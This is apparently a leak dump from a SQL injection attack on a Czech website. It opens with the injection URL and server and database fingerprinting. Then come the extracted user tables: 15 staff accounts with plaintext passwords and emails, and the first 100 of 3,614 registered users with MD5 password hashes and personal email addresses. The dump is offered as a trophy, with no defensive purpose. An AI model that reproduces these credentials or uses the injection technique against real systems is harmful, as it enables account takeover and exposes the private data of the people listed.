- Target: http://www.prdel.cz/index_vypis.php?id=-1 OR 17-7=10
- Host IP: 127.0.0.1 (Proxy IP)
- Web Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2
- Powered-by: PHP/5.3.8
- DB Server: MySQL
- Resp. Time(avg): 6465 ms
- Current User: prdel_cz@localhost
- Sql Version: 5.5.17
- Current DB: prdel_cz
- System User: prdel_cz@localhost
- Host Name: fubar.sigpipe.cz
- Installation dir: /usr/local
- DB User: 'prdel_cz'@'localhost'
- Data Bases: information_schema, prdel_cz, test
- Data Base: prdel_cz
- Table: prd_autent
- Total Rows: 15
- Column found: id
- Column found: jmeno
- Column found: heslo
- Column found: podpis
- Column found: mail
- Column found: funkce
- Column found: major
- Count(*) of prdel_cz.prd_autent is 15
- //--------------------------------------------------------------------------------
- id jmeno heslo podpis mail funkce major
- 1 costra kost22 Costra costrova@prdel.cz 2
- 2 sowanso route66 Sowanso sowansova@prdel.cz 2
- 3 bahamaz baha22 Bahamaz polibte.nam@prdel.cz redaktor 2
- 4 nikdo asxsfd22s polibte.nam@prdel.cz 0
- 5 blafunka blaf22 Blafunka redaktorka 1
- 6 neznamy nez22 0
- 7 krysar krysa22 Krysa redaktor redaktor 0
- 8 corvin cor22vin Corvin corvinova@prdel.cz 2
- 9 mucker muck22 Mucker 0
- 10 tiskar tisk22 tiska polibte.nam@prdel.cz 0
- 11 Blackfloyd bla22flo Blackfloyd blackfloyd@centrum.cz 0
- 12 Mic mi22c Mic 0
- 13 sob sob66 Sob jiri.sobotka@post.cz spoluredaktor 1
- 14 greenspace wwwqq Greenspace 0
- 15 redakce dsfreiou redakce polibte.nam@prdel.cz 0
- --------------------------------------------------------------------------------//
- -----------------------------------------------------------------------------------**
- Count(*) of prdel_cz.prd_reg is 3614
- Column found: id
- Column found: login
- Column found: heslo
- Column found: mail
- Column found: datum_reg
- Column found: zeme
- Column found: podpis
- Column found: opravneni
- Column found: popis
- Column found: posl_posta
- Column found: nova_posta
- Column found: edit
- Column found: od_datum
- Column found: do_datum
- Column found: id_vlozil
- -- Added only the first 100 items ;)
- id login heslo mail podpis popis
- 1 d7e77c835af3d2a803c1cf28d60575bc neregistrov
- 2 Costra 413a54249f7a332a50d2242b6f341c65 costrova@prdel.cz Costra
- 3 Sowanso 151de84cca69258b17375e2f44239191 sowansova@prdel.cz Sowanso redaktor press
- 4 mucker c430d630174a7562f316de1422d7aad0 mucker@acid.cz Mucker
- 7 zblnk a369371bfdee5bf8a86b7855a22dd4da kika_badinska@yahoo.com
- 8 Zuzanka c07fefbae558f73d32686dec591af0ac suzzn66@hotmail.com
- 9 Hajdalak cb9a573872ba723dca2c7200e94f5eae prdelac@atlas.cz
- 10 Achojda fad3d364b57482bc8554ffa0fc8b66d6 Petulka.broucek@email.cz
- 11 Blackfloyd fb166902e26da020adb9e98a06069b06 blackfloyd@centrum.cz Blackfloyd redaktor
- 12 mikasyko 53c04118df112c13a8c34b38343b9c10 mikasyko@quick.cz
- 13 Milhaus18 827ccb0eea8a706c4c34a16891f84e7b Mafiouzis@seznam.cz
- 14 BoB d38ee19a4815c4aeba48227913092a6e robert.m@seznam.cz Bob redaktor
- 15 kali 4e4f523705f88c7253fc492d5a45743a jacho@post.cz
- 16 Krysar 81dc9bdb52d04dc20036dbd8313ed055 Krysa retraktor s p??alou
- 17 Drag 4edb2dc80889b1aec708ec4730f22387 kenilej666rtep@seznam.cz
- 18 Mirage 6cdc2b547529980d7f5e3b049b5150c9 xmirage@seznam.cz
- 19 Jitulinka c004b41d7921885f30c6474346fd2093 jtomanova@atlas.cz
- 20 jeniffer 22cb90807a19a5e2044756b089fa43ff
- 21 juppe 4790dfcb68fb43663e5ea74812cfc303 juppe@post.cz
- 22 Polibte.mi 0bcd844c7341754504e7e7f7a6582612 royman@email.cz
- 23 DjEm 2ce1ec32abcc09b95e64b14a9 1f2 f0450c1 sexibj@seznam.cz
- 24 06b2af75179fb94be097af182a442a4a michalgavlik@atlas.cz
- 25 P.P. 6ad61cf51456e20a2b6d8db294314de8
- 26
- 27 Petrd petrdj@post.cz
- 28 lunochod f39e6bec5195ca34d8b1cd33573f32a3 bilk7a@gytu.cz
- 29 Test 098f6bcd4621d373cade4e832627b4f6
- 30 pusa a32afbe54e4fbab0c8c44c01f5b90792 lucie87@centrum.cz
- 31 Nick 92c3b916311a5517d9290576e3ea37ad nick.king@quick.cz
- 32 vakalva 00fb6e1a2b7112baa41a5d2a85a9b357 Ivaneckaa@atlas.cz
- 33 KiiX ea1d6af7146d36d87ec481c3bf83cb35 KiiX@centrum.cz
- 34 1stenly 519dbf3fae4a9af1c6b4b4a0fc381ef0
- 35 abdul b6575858aecddd94af4abc23a24bf5f2 abdul@easemail.com
- 36 Lilith 2aee1c40199c7754da766e61452612cc lilith.d@email.cz
- 37 K.C. e3928a3bc4be46516aa33a79bbdfdb08 k.c.goodspeed@seznam.cz
- 38 gulasmen 738a6457be8432bab553e21b4235dd97 gulasmen@centrum.cz
- 39 milan 4bff2b649206a5609914986c92d06e12 vo.lomnice@atlas.cz
- 45 Delvita 37b43a655dec0e3504142003fce04a07 Deathmetal.Deicide@seznam.cz
- 46 mutant pepa 6074c6aa3488f3c2dddff2a7ca821aab mutantpepa@seznam.cz
- 47 Guppy aa47f8215c6f30a0dcdb2a36a9f4168e daniel.bazant@worldonline.cz
- 48 Brom_O_berin cc1f891423db1ee24498e76f3b107bbe berin@seznam.cz Brom O`berin
- 49 Crysa 76d084c2c90b5a76e7f2ca9a1a2f3980
- 50 medulka 0ea711391df8d060f4f81141e192814e handa@can.com
- 51 Prd f5467257608e18e5347354fe9198309b Marcutio@seznam.cz
- 52 Krist b46b30c3eda21e2fd3337bd5c0c0d486 kristous@seznam.cz
- 53 Martin Philippi 034483eb25564607c159035ed87a0c21 philippim@seznam.cz
- 54 Aaliyah 6813ad2917a9674bdf5c8f8bb2a04deb wu@email.cz
- 55 Pavel ca3ec598002d2e7662e2ef4bdd58278b p.vosahlik@wo.cz
- 56 Fluke f5f2e5896162f870b47efde00fc12894 flukeho@email.cz
- 57 radek 25df35de87aa441b88f22a6c2a830a17 freeman.t@centrum.cz
- 58 blech 1cca5f8a2bc5f4cc5b0782325eea2ee1 blech@centrum.cz
- 59 Magoor b3e654e3acf57cfbe6eb7e4a682ac740 magoor@click.cz
- 60 Mrs love d9479746ea51a4177f8bc092c5db7b8d SvrcinovaM@seznam.cz
- 61 Lenunka a384b6463fc216a5f8ecb6670f86456a lenunka@centrum.cz
- 62 hnismatlavej 97edfa43843271c6a4146d888ba9696f barpos@post.cz
- 63 prdelnice 055705420655acce96cfe0ca22b38bcc narciska@freemejl.cz
- 64 perak 076e1f7429091d4688b28b0f4e3374d1
- 65 xzoombikx e10adc3949ba59abbe56e057f20f883e xzoombikx@freemejl.cz
- 66 sleeva f666a8be6b2e0c1f0f66c58060124316 euphorion@post.cz
- 67 Marcela e60c7e24808655f86ceed8cb7d3e536d MarcelaCh@seznam.cz
- 68 Marylin 4cbfe67340292113c37189ac59871696 a.vitkova@seznam.cz
- 69 Bossak 955db0b81ef1989b4a4dfeae8061a9a6 ilovelunetic@seznam.cz
- 70 Tom 9ad97add7f3d9f29cd262159d4540c96 tomaskonva@volny.cz
- 71 j 3e55517aea64f6d368ef836459f15182 tchlup@soubce.cz
- 72 Sexy.cat 5bbc1df343ed3672a1ffd93d2de417ae Sexy.cat@seznam.cz
- 73 bisekmartin 955db0b81ef1989b4a4dfeae8061a9a6 martin.bisek@worldonline.cz
- 74 PanKlobouk 8627652212182177254630a62f81d801 lord.edmond@centrum.cz
- 75 Shadya 318fbaf5acbf2b69a202de4c6df4cd2c Shadya@atlas.cz
- 76 Adam 7d3e28d14440d6c07f73b7557e3d9602 zead@post.cz
- 77 Sraida 153697b4d766ede6971ee05a9d42e86c -Dido-@quick.cz
- 78 Mistr 140548adadcd75f4918901e83de48ebd
- 79 Charlie bf779e0933a882808585d19455cd7937 k.kovar@email.cz
- 80 Giltanas 02b65838e9d004709a94c8b3b46f01b3 ronovskv@gjr.cz
- 81 Bolik ec733571061b115252c5e38269cce13f bolik@seznam.cz
- 82 milka 827ccb0eea8a706c4c34a16891f84e7b
- 83 roger 3aa26518a06fdd715a5c93af12d8cdc5
- 84 nicky2001 f39322759f5c3e0db8d32b41a3312904 nicky2001@seznam.cz
- 85 kocur cd62562929ed9d64a1fda3c911f9de9d
- 86 ZZsup c4459bc0bba5a7fd3a0ee521c2cbbc18 ZZsup@guick.cz
- 87 mecma a72e6e60313605028784645efb13ca5c mecma@seznam.cz
- 88 Dub 6d577dceec0057176f6a08dba512af40 doubek.jirka@quick.cz
- 89 kuglimug 59f9d76078b0422c34ce11f8bee61373
- 90 Hana 785bb1e5e77a14325fd31ebeae836fff H.Melkusova@seznam.cz
- 91 Olinka ecc5b00cf0f3653b868990f8e3c7243f olinka.stolfova@post.cz
- 92 Ivosek 0eacfc1178fe6ff4265ba27dc69656be IvoVelicka@seznam.cz
- 93 jitus ebd5057f5e0c63cd89fb41e30f3c0077
- 94 Cindy 76bd0d90a1b88cfec6068f88d6d04dff
- 95 88d52b35e5147c0115bcd5c5dd7f7e3f
- 96 maus007 fc5cdb17ceffded1e53d9be32e54ebb1 maus007@seznam.cz
- 97 dextra 587c5b83f70ff651700e3b75953fb9d7
- 98 martina 2f0714f5365318775c8f50d720a307dc
- 99 chozearmando 17e94cd7242c7f3b9022eacf5855fe91 chozearmando@xko.cz
- 100 satan 87df2cd1570fd297de238aeee667fe0a
- -----------------------------------------------------------------------------------**